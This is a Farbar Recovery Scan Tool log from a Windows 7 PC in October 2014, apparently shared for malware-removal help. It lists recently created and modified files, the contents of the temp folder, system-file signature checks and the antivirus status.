2014-10-24 00:06 - 2013-10-01 17:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2014-10-24 00:06 - 2013-10-01 17:08 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2014-10-24 00:06 - 2013-10-01 17:01 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2014-10-24 00:06 - 2013-10-01 16:58 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2014-10-24 00:06 - 2013-10-01 16:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-24 00:06 - 2013-10-01 16:08 - 00855552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2014-10-24 00:06 - 2013-10-01 15:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-24 00:03 - 2014-10-24 00:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-24 00:03 - 2014-10-24 00:03 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-24 00:03 - 2014-10-24 00:03 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-24 00:03 - 2014-10-24 00:03 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00645120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsIntl.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00616104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dat
2014-10-24 00:03 - 2014-10-24 00:03 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-24 00:03 - 2014-10-24 00:03 - 00610304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00413696 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-24 00:03 - 2014-10-24 00:03 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2014-10-24 00:03 - 2014-10-24 00:03 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00208384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\elshyph.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00182272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msls31.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iexpress.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00131072 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IEAdvpack.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00105984 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00101376 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-24 00:03 - 2014-10-24 00:03 - 00074240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SetIEInstalledDate.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardie.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2014-10-24 00:03 - 2014-10-24 00:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pngfilt.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmler.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imgutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licmgr10.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-23 23:56 - 2012-08-23 07:13 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2014-10-23 23:56 - 2012-08-23 07:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2014-10-23 23:56 - 2012-08-23 04:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2014-10-23 23:56 - 2012-08-23 03:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2014-10-23 23:55 - 2014-10-23 23:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-10-23 23:52 - 2014-10-23 23:52 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-10-23 23:52 - 2014-10-23 23:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-10-23 09:02 - 2014-10-23 09:02 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-20 22:25 - 2014-10-27 07:02 - 00000000 ____D () C:\Qoobox
2014-10-20 22:25 - 2014-10-21 00:13 - 00000000 ____D () C:\Windows\erdnt
2014-10-20 22:25 - 2011-06-25 23:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-20 22:25 - 2010-11-07 10:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-20 22:25 - 2009-04-19 21:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-20 22:25 - 2000-08-30 17:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-20 21:51 - 2014-10-25 00:10 - 00000000 ____D () C:\AdwCleaner
2014-10-19 13:52 - 2014-10-25 02:06 - 00000000 ____D () C:\Windows\pss
2014-10-19 12:12 - 2014-10-27 01:51 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-19 12:11 - 2014-10-20 21:28 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-19 12:11 - 2014-10-19 12:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 12:11 - 2014-10-19 12:11 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-19 12:11 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-19 12:11 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-19 01:46 - 2014-10-20 21:50 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-19 01:07 - 2014-10-19 01:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-10-18 23:12 - 2014-10-18 23:12 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\WinPatrol
2014-10-16 09:12 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 09:12 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 09:12 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 09:11 - 2014-09-17 19:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 09:11 - 2014-09-17 18:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 09:11 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 09:11 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-16 09:11 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 09:11 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 09:11 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 09:11 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 09:11 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-16 09:11 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 09:11 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-16 09:11 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 09:11 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-07 12:50 - 2014-10-27 13:58 - 01104814 _____ () C:\Windows\WindowsUpdate.log
2014-10-04 13:45 - 2014-10-23 11:58 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\CDisplayEx
2014-10-04 13:45 - 2014-10-04 13:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CDisplayEx
2014-10-04 13:45 - 2014-10-04 13:45 - 00000000 ____D () C:\Program Files\CDisplayEx
2014-10-04 11:38 - 2014-10-21 15:24 - 00000000 ____D () C:\Users\McLain\Documents\ebay2
2014-10-04 02:13 - 2014-10-04 03:31 - 00000000 ____D () C:\Users\McLain\Documents\characters
2014-10-01 12:22 - 2014-09-24 19:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 12:22 - 2014-09-24 18:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-27 14:01 - 2009-07-13 21:45 - 00009920 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-27 14:01 - 2009-07-13 21:45 - 00009920 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 13:54 - 2011-07-09 00:30 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-27 13:53 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-27 08:26 - 2012-12-02 19:52 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-27 08:21 - 2011-07-09 00:30 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-27 07:01 - 2009-07-13 19:34 - 00000215 _____ () C:\Windows\system.ini
2014-10-27 03:04 - 2011-06-10 22:20 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Skype
2014-10-27 01:33 - 2013-05-08 21:49 - 00000000 ____D () C:\Program Files (x86)\Mp3tag
2014-10-27 01:33 - 2011-07-09 00:30 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-27 01:01 - 2013-05-16 12:57 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-27 01:01 - 2012-06-05 15:18 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\vlc
2014-10-27 00:57 - 2011-07-09 00:30 - 00000000 ____D () C:\Users\McLain\AppData\Local\Google
2014-10-27 00:56 - 2014-02-02 23:42 - 00000000 ____D () C:\Program Files (x86)\RegSeeker
2014-10-27 00:55 - 2014-01-15 18:09 - 00000000 ____D () C:\ProgramData\TEMP
2014-10-27 00:51 - 2014-07-29 00:04 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\uTorrent
2014-10-26 15:12 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-10-25 00:16 - 2011-05-19 23:30 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-24 01:12 - 2009-08-05 11:14 - 00000000 ____D () C:\Windows\Panther
2014-10-24 00:11 - 2009-07-13 20:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-24 00:08 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-23 23:43 - 2013-07-18 21:16 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-23 23:43 - 2009-07-13 21:45 - 04889728 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-23 09:59 - 2011-05-15 21:15 - 00059824 _____ () C:\Users\McLain\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-21 00:14 - 2009-07-13 20:20 - 00000000 __RHD () C:\Users\Default
2014-10-20 22:02 - 2011-05-15 21:11 - 00000000 ____D () C:\Users\McLain
2014-10-20 17:38 - 2009-07-13 22:13 - 00782228 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-20 01:17 - 2014-07-10 12:03 - 00000000 ____D () C:\Users\McLain\AppData\Local\Adobe
2014-10-20 01:15 - 2012-12-02 19:52 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-10-20 01:15 - 2012-10-11 10:33 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-10-20 01:15 - 2011-05-16 07:14 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-10-19 01:33 - 2011-07-12 23:13 - 00000000 ____D () C:\Program Files\WinRAR
2014-10-19 01:07 - 2011-09-22 03:53 - 00000000 ____D () C:\ProgramData\Apple Computer
2014-10-19 01:07 - 2011-09-22 03:53 - 00000000 ____D () C:\Program Files (x86)\QuickTime
2014-10-19 01:04 - 2011-07-12 23:13 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-19 01:04 - 2011-07-12 23:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-18 23:41 - 2012-12-22 14:08 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Amazon
2014-10-18 23:41 - 2012-12-22 14:08 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon
2014-10-18 23:41 - 2012-12-22 14:08 - 00000000 ____D () C:\Program Files (x86)\Amazon
2014-10-18 23:36 - 2012-07-29 02:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe
2014-10-18 23:36 - 2010-11-02 09:57 - 00000000 ____D () C:\Program Files (x86)\Adobe
2014-10-18 23:35 - 2012-08-23 23:00 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-18 23:35 - 2010-11-02 09:57 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-18 23:34 - 2011-05-15 21:18 - 00000000 ____D () C:\Users\McLain\AppData\Roaming\Adobe
2014-10-18 23:32 - 2014-04-19 00:43 - 00000000 ____D () C:\Program Files (x86)\AbiWord
2014-10-18 10:08 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-17 20:16 - 2011-07-09 00:30 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-17 20:16 - 2011-07-09 00:30 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 03:11 - 2014-05-28 03:22 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 03:00 - 2011-06-25 19:14 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-14 00:53 - 2011-05-16 07:10 - 00000389 _____ () C:\Windows\Brownie.ini
2014-10-02 15:53 - 2011-08-28 11:00 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

Some content of TEMP:
====================
C:\Users\McLain\AppData\Local\Temp\avgnt.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-26 15:03

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-10-2014
Ran by McLain at 2014-10-27 14:06:18
Running from C:\Users\McLain\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avira Desktop (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Desktop (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

